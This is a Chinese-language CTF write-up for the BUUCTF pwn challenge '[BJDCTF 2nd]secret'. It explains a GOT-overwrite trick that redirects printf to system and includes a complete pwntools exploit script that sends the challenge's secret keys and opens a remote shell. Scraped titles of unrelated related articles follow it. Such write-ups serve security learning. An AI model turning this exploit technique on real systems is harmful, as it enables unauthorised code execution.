感觉这道题技巧性比较强


有两次输入 一次名字,一次 密码


先进 46A3AF


这里有一次输入 name

看一下 0x40136D的汇编

这里每次有一次 调用 0x46A329,并且 有一次cmp比较; 那么进入 0x46a329


进去看看0x401301



发现 printf_plt 的位置 与 system的位置相差0x10即16
我们可以一开始输入name的时候输入bin/sh; 把0x46d090覆盖为printf_plt,
经过16次输入比较, 前15次输入对的,最后一次输入错误的,使地址偏移为 system,
得到flag;

思路

输入name 为 bin/sh
修改off_46D090, 为printf_got。
答对15次,答错一次刚好16次即0x10
使得printf_got指向system
from pwn import *p = remote('node3.buuoj.cn',26671)elf = ELF('./2')printf_got=elf.got['printf']keys=[0x476B,0x2D38,0x4540,0x3E77,0x3162,0x3F7D,0x357A,0x3CF5,0x2F9E,0x41EA,0x48D8,0x2763,0x474C,0x3809,0x2E63]payload='/bin/sh\x00'.ljust(0x10,'a')+p32(printf_got)p.sendlineafter("What's your name?",payload)for a in keys:p.sendlineafter('Secret:',str(a))p.sendlineafter('Secret:','1')p.interactive()

BUUCTF(pwn)[BJDCTF 2nd]secret相关推荐

  1. [BUUCTF-pwn]——[BJDCTF 2nd]secret

    [BUUCTF-pwn]--[BJDCTF 2nd]secret 这道题目,看就考验你的汇编能力了. 因为在反汇编的过程中,有一个函数过大,无法反汇编 在IDA中看到一个格外令人喜欢的东西,可是if ...

  2. BUUCTF:[BJDCTF 2nd]EasyBaBa

    题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]EasyBaBa binwalk分析,foremost分离 解压压缩包得到里面都是出题人.jpg 010 ...

  3. BUUCTF:[BJDCTF 2nd]圣火昭昭-y1ng

    题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]%E5%9C%A3%E7%81%AB%E6%98%AD%E6%98%AD-y1ng 新约佛论禅加密 新约佛 ...

  4. ------已搬运-------BUUCTF:[BJDCTF 2nd]假猪套天下第一-----------Header请求头学习!!!

    了解这个:Header:请求头详解.就全都会了.就,, 最水记录,,,, 不足: 1.tmd.抓包瞎jb抓,有登录页面,不知道抓包的时候输入参数,抓输入参数的时候的包,我真吐了,,,哎,怎么能这么傻啊 ...

  5. BUUCTF:[BJDCTF 2nd]假猪套天下第一

    先测试一下admin用户,发现会回弹 在测试一下其他账户,发现会进入 (下面那个root点进去是y1ng师傅的网站) 我们试着抓个包,发现存在着一个提示 打开这个L0g1n.php发现里面是 提示99 ...

  6. [BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2

    [BUUCTF-pwn]--[BJDCTF 2nd]ydsneedgirlfriend2 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]ydsneedg ...

  7. [BUUCTF-pwn]——[BJDCTF 2nd]r2t3

    [BUUCTF-pwn]--[BJDCTF 2nd]r2t3 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 题目: 先将文件下载下来,chec ...

  8. buuctf pwn wp(第四波)格式化字符串漏洞系列

    这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...

  9. [BJDCTF 2nd] Web复现 wp

    文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...

最新文章

  1. 神州数码使用telnet方式管理交换机
  2. Hessian RPC示例和基于Http请求的Hessian序列化对象传输
  3. sqlite3.OperationalError: database is locked
  4. 吐血,经过4个小时,终于发现这个可以解决虚拟机ubuntu不能联网的问题
  5. mysql 导出gbk_mysqldump指定编码导出数据,GBK编码实践
  6. vue-cli的初步使用
  7. 选择题_一级造价师选择题的分值是多少
  8. 【Rpc】基于开源Dubbo分布式RPC服务框架的部署整合
  9. CSS练习_无限滚动
  10. php短路逻辑,JS利用短路原理简写if语句
  11. 【Oracle 集群】ORACLE DATABASE 11G RAC 知识图文详细教程之RAC 工作原理和相关组件(三)...
  12. 使用JAVA实现邮件发送功能
  13. 异贝,通过移动互联网技术,为中小微实体企业联盟、线上链接、线上线下自定义营销方案推送。案例8
  14. Filezilla Server使用教程
  15. Matlab求解微分、积分方程
  16. Java-Aspose实现上传Excel、Word转换为PDF并进行下载
  17. 博图SCL 选择排序
  18. 系统分析员、系统架构师、项目经理的区别
  19. 怎样才能在网上快速赚到钱?
  20. 神经架构搜索(NAS)2020最新综述:挑战与解决方案

热门文章

  1. Vista命令行大全
  2. echarts相关的可视化数据
  3. mpvue生命周期初探
  4. 一位数据科学家的私房工具清单
  5. PostgreSQL GIN multi-key search 优化
  6. 专为Android加载图片Fresco:详细图解SimpleDraweeView加载图片基础
  7. mysql服务器(二)
  8. .NET疯狂架构经验分享系列之(七)WCF支持(转)
  9. ie浏览器里面无法输入文字:
  10. ASP.NET 2.0 XML 系列(2): XML技术